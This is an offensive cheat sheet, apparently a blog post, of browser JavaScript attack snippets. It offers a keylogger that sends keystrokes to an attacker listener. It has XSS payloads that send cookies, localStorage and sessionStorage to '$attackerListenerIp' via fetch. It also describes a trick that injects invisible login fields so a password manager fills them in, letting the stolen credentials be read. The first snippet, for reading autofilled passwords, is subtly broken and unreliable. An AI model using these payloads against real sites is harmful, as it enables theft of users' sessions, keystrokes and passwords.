Get hidden content from password fields
Scenario:
- You analyse a system where a username / password was automatically filled out.
- You want to extract the password.
Use JavaScript for extraction. Copy and pase the following into the web browser’s console:
let fields = document.getElementsByTagName("input");
for (let field in fields) {
console.log(input.value);
}
Extract keystrokes live from a Browser
Scenario:
- You have access to a JS console from some user.
- You want to log the keystrokes of a page.
Do:
- Open a listener on an own server, e.g.
python -m http.server 80 - Paste the following JS in the web browser’s console:
function logKey(event){
fetch("http://$attackerListenerIp/k?key=" + event.key)
}
document.addEventListener('keydown', logKey);
Extract Cookies
Scenario:
- You can inject JS (XSS / direct access) and want to get all cookies.
Inject/Do:
let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("http://$attackerListenerIp/d?data=" + encodedCookie)
Extract local / session storage
Like above:
let data = JSON.stringify(localStorage)
let encodedData = encodeURIComponent(data)
fetch("http://$attackerListenerIp/d?data=" + encodedData)
let data = JSON.stringify(sessionStorage)
let encodedData = encodeURIComponent(data)
fetch("http://$attackerListenerIp/d?data=" + encodedData)
Stealing site passwords
Scenario:
- A password manager is used by a user where you can inject JS.
Then, inject JS which adds an invisible user/username/name text field and a field with type="password". Wait some seconds and then, extract the value of these fieds. If a password manager is in place, it may have filled in sensitive data automatically.
Leave a Reply
You must be logged in to post a comment.